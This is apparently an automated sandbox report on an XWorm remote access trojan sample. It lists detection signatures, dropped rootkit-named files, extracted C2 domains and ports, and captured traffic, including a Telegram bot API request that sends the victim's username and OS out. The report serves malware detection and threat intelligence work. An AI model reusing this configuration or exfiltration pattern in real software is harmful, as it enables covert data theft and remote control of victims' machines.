Windows Analysis Report
mIURiU8n2P.exe

Overview

General Information

Sample name: mIURiU8n2P.exe
renamed because original name is a hash value
Original sample name: bd00a7577088b67b52699f956275a3f563d623ca907feeeaee8d2f821d35de40.exe
Analysis ID: 1532627
MD5: e1c82191b678cea8f3c996887ddc1232
SHA1: 7946006ca278892817b7a778eea1e04f5b2f948c
SHA256: bd00a7577088b67b52699f956275a3f563d623ca907feeeaee8d2f821d35de40
Tags: exeuser-Chainskilabs

Detection

XWorm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Telegram RAT
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code contains process injector
.NET source code contains very large strings
.NET source code references suspicious native API functions
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to inject code into remote processes
Contains functionality to log keystrokes (.Net Source)
Creates a thread in another existing process (thread injection)
Creates multiple autostart registry keys
Drops PE files to the user root directory
Found suspicious powershell code related to unpacking or dynamic code loading
Hooks files or directories query functions (used to hide files and directories)
Hooks processes query functions (used to hide processes)
Hooks registry keys query functions (used to hide registry keys)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Installs new ROOT certificates
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Obfuscated command line found
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Execution from Suspicious Folder
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential WinAPI Calls Via CommandLine
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Program Location with Network Connections
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Creates job files (autostart)
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Uncommon Svchost Parent Process
Stores files to the Windows start menu directory
Stores large binary data to the registry
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

AV Detection

Source: mIURiU8n2P.exe Avira: detected
Source: C:\Users\user\AppData\Local\DeadROOTkit.exe Avira: detection malicious, Label: TR/Spy.Gen
Source: C:\Users\Public\DeadXClient.exe Avira: detection malicious, Label: HEUR/AGEN.1305769
Source: C:\Users\Public\DeadCodeRootKit.exe Avira: detection malicious, Label: TR/Dropper.MSIL.Gen
Source: C:\Users\Public\Deadsvchost.exe Avira: detection malicious, Label: HEUR/AGEN.1305769
Source: C:\Users\Public\DeadROOTkit.exe Avira: detection malicious, Label: TR/Spy.Gen
Source: 00000000.00000002.1703934967.0000000002781000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Xworm {"C2 url": ["subscribe-bond.gl.at.ply.gg"], "Port": "28600", "Aes key": "<Xwormmm>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
Source: subscribe-bond.gl.at.ply.gg Virustotal: Detection: 8%
Source: C:\Users\Public\DeadCodeRootKit.exe ReversingLabs: Detection: 91%
Source: C:\Users\Public\DeadCodeRootKit.exe Virustotal: Detection: 81%
Source: C:\Users\Public\DeadROOTkit.exe ReversingLabs: Detection: 87%
Source: C:\Users\Public\DeadROOTkit.exe Virustotal: Detection: 64%
Source: C:\Users\Public\DeadXClient.exe ReversingLabs: Detection: 95%
Source: C:\Users\Public\DeadXClient.exe Virustotal: Detection: 71%
Source: C:\Users\Public\Deadsvchost.exe ReversingLabs: Detection: 95%
Source: C:\Users\Public\Deadsvchost.exe Virustotal: Detection: 71%
Source: C:\Users\user\AppData\Local\DeadROOTkit.exe ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\DeadROOTkit.exe Virustotal: Detection: 64%
Source: mIURiU8n2P.exe ReversingLabs: Detection: 73%
Source: mIURiU8n2P.exe Virustotal: Detection: 67%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\DeadROOTkit.exe Joe Sandbox ML: detected
Source: C:\Users\Public\DeadXClient.exe Joe Sandbox ML: detected
Source: C:\Users\Public\DeadCodeRootKit.exe Joe Sandbox ML: detected
Source: C:\Users\Public\Deadsvchost.exe Joe Sandbox ML: detected
Source: C:\Users\Public\DeadROOTkit.exe Joe Sandbox ML: detected
Source: mIURiU8n2P.exe Joe Sandbox ML: detected
Source: 2.0.DeadROOTkit.exe.1a0000.0.unpack String decryptor: updates-full.gl.at.ply.gg
Source: 2.0.DeadROOTkit.exe.1a0000.0.unpack String decryptor: 60075
Source: 2.0.DeadROOTkit.exe.1a0000.0.unpack String decryptor: <123456789>
Source: 2.0.DeadROOTkit.exe.1a0000.0.unpack String decryptor: <Xwormmm>
Source: 2.0.DeadROOTkit.exe.1a0000.0.unpack String decryptor: USB.exe
Source: 2.0.DeadROOTkit.exe.1a0000.0.unpack String decryptor: BTC_Address
Source: 2.0.DeadROOTkit.exe.1a0000.0.unpack String decryptor: ETH_Address
Source: 2.0.DeadROOTkit.exe.1a0000.0.unpack String decryptor: TRC20_Address
Source: 2.0.DeadROOTkit.exe.1a0000.0.unpack String decryptor: Your_Token
Source: 2.0.DeadROOTkit.exe.1a0000.0.unpack String decryptor: Your_ID
Source: C:\Users\Public\DeadCodeRootKit.exe Code function: 3_2_00B01000 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext, 3_2_00B01000
Source: mIURiU8n2P.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: mIURiU8n2P.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000017.00000000.1840584622.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2942503144.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\wctAB5F.tmp.pdb source: svchost.exe, 00000017.00000000.1840558344.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2941691166.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000017.00000002.2940183395.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000000.1840509505.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000017.00000000.1840558344.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2941691166.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000017.00000000.1840558344.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2941691166.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000017.00000002.2940183395.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2.pdbr source: svchost.exe, 00000017.00000000.1840558344.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2941691166.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000017.00000000.1840584622.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2942503144.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: WINLOA~1.PDB source: svchost.exe, 00000017.00000000.1840558344.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2941691166.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000017.00000000.1840584622.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2942503144.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000017.00000002.2940183395.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000000.1840509505.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000017.00000000.1840558344.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2941691166.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\wct3D66.tmp.pdb source: svchost.exe, 00000017.00000000.1840584622.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2942503144.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000017.00000002.2940183395.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000000.1840509505.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb* source: svchost.exe, 00000017.00000000.1840584622.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2942503144.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000017.00000000.1840584622.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2942503144.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\wmsetup.log.pdb source: svchost.exe, 00000017.00000000.1840558344.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2941691166.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000017.00000002.2940183395.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000000.1840509505.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000017.00000000.1840584622.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2942503144.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: C:\Users\Public\DeadCodeRootKit.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\Public\DeadCodeRootKit.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\Public\DeadCodeRootKit.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\Public\DeadCodeRootKit.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Users\Public\DeadCodeRootKit.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Users\Public\DeadCodeRootKit.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
Source: C:\Users\Public\DeadCodeRootKit.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
Source: C:\Users\Public\DeadCodeRootKit.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
Source: C:\Windows\System32\dllhost.exe Code function: 6_2_000002E86A09BF5C FindFirstFileExW, 6_2_000002E86A09BF5C
Source: C:\Windows\System32\winlogon.exe Code function: 11_2_00000225DC64BF5C FindFirstFileExW, 11_2_00000225DC64BF5C
Source: C:\Windows\System32\lsass.exe Code function: 12_2_00000202C0AEBF5C FindFirstFileExW, 12_2_00000202C0AEBF5C
Source: C:\Windows\System32\svchost.exe Code function: 14_2_000002A66130BF5C FindFirstFileExW, 14_2_000002A66130BF5C
Source: C:\Windows\System32\dwm.exe Code function: 16_2_000002BAAF21BF5C FindFirstFileExW, 16_2_000002BAAF21BF5C
Source: C:\Windows\System32\svchost.exe Code function: 17_2_0000026A879CBF5C FindFirstFileExW, 17_2_0000026A879CBF5C
Source: C:\Windows\System32\svchost.exe Code function: 19_2_00000179537ABF5C FindFirstFileExW, 19_2_00000179537ABF5C
Source: C:\Windows\System32\svchost.exe Code function: 20_2_000002295D56BF5C FindFirstFileExW, 20_2_000002295D56BF5C

Networking

Source: Network traffic Suricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.4:49738 -> 147.185.221.21:28600
Source: Network traffic Suricata IDS: 2853685 - Severity 1 - ETPRO MALWARE Win32/XWorm Checkin via Telegram : 192.168.2.4:49739 -> 149.154.167.220:443
Source: C:\Windows\System32\svchost.exe Domain query: updates-full.gl.at.ply.gg
Source: C:\Windows\System32\svchost.exe Domain query: subscribe-bond.gl.at.ply.gg
Source: C:\Windows\System32\svchost.exe Domain query: api.telegram.org
Source: Malware configuration extractor URLs: subscribe-bond.gl.at.ply.gg
Source: unknown DNS query: name: api.telegram.org
Source: Yara match File source: 2.0.DeadROOTkit.exe.1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.mIURiU8n2P.exe.27c5330.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: C:\Users\user\AppData\Local\DeadROOTkit.exe, type: DROPPED
Source: Yara match File source: C:\Users\Public\DeadROOTkit.exe, type: DROPPED
Source: global traffic TCP traffic: 192.168.2.4:49731 -> 147.185.221.21:28600
Source: global traffic TCP traffic: 192.168.2.4:49740 -> 147.185.221.20:60075
Source: global traffic TCP traffic: 192.168.2.4:52581 -> 1.1.1.1:53
Source: global traffic HTTP traffic detected: GET /botYour_Token/sendMessage?chat_id=Your_ID&text=%E2%98%A0%20%5BXWorm%20V3.0%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A161EDF6F280165B1D298%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: Joe Sandbox View IP Address: 208.95.112.1
Source: Joe Sandbox View IP Address: 149.154.167.220
Source: Joe Sandbox View ASN Name: TUT-ASUS
Source: Joe Sandbox View ASN Name: TELEGRAMRU
Source: Joe Sandbox View ASN Name: SALSGIVERUS
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown DNS query: name: ip-api.com
Source: unknown TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic DNS traffic detected: DNS query: ip-api.com
Source: global traffic DNS traffic detected: DNS query: subscribe-bond.gl.at.ply.gg
Source: global traffic DNS traffic detected: DNS query: api.telegram.org
Source: global traffic DNS traffic detected: DNS query: updates-full.gl.at.ply.gg
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 13 Oct 2024 17:15:49 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: DeadROOTkit.exe, 00000002.00000002.2956134718.000000000243F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://api.telegram.org
Source: lsass.exe, 0000000C.00000000.1774122233.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1774122233.00000202C03B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2969201803.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2969201803.00000202C03B3000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: lsass.exe, 0000000C.00000000.1763590382.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2974624894.00000202C0400000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1774441153.00000202C0402000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: lsass.exe, 0000000C.00000000.1774122233.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1763590382.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2952382254.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2969201803.00000202C0390000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: lsass.exe, 0000000C.00000000.1774122233.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1774122233.00000202C03B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1763590382.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2969201803.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000003.2189100927.00000202C0351000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000003.1786428389.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1766962440.00000202C037F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
Source: lsass.exe, 0000000C.00000000.1774122233.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1774122233.00000202C03B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2969201803.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000003.2189100927.00000202C0351000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2969201803.00000202C03B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000003.1786428389.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2967895483.00000202C0379000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1766962440.00000202C037F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
Source: lsass.exe, 0000000C.00000002.2974624894.00000202C0400000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1774441153.00000202C0402000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
Source: lsass.exe, 0000000C.00000000.1774122233.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1774122233.00000202C03B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2969201803.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2969201803.00000202C03B3000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: lsass.exe, 0000000C.00000000.1763590382.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2974624894.00000202C0400000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1774441153.00000202C0402000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: lsass.exe, 0000000C.00000000.1774122233.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1774122233.00000202C03B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1763590382.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2969201803.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000003.2189100927.00000202C0351000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000003.1786428389.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1766962440.00000202C037F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
Source: lsass.exe, 0000000C.00000000.1774122233.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1763590382.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2952382254.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2969201803.00000202C0390000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: lsass.exe, 0000000C.00000002.2974624894.00000202C0400000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1774441153.00000202C0402000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: lsass.exe, 0000000C.00000000.1774122233.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1774122233.00000202C03B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2969201803.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000003.2189100927.00000202C0351000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2969201803.00000202C03B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000003.1786428389.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2967895483.00000202C0379000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1766962440.00000202C037F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
Source: lsass.exe, 0000000C.00000000.1774122233.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1774915423.00000202C043D000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2969201803.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1763730672.00000202C024B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: lsass.exe, 0000000C.00000000.1774122233.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1774122233.00000202C03B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2969201803.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2969201803.00000202C03B3000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: lsass.exe, 0000000C.00000000.1774122233.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1763590382.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2952382254.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2969201803.00000202C0390000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: lsass.exe, 0000000C.00000002.2974624894.00000202C0400000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1774441153.00000202C0402000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
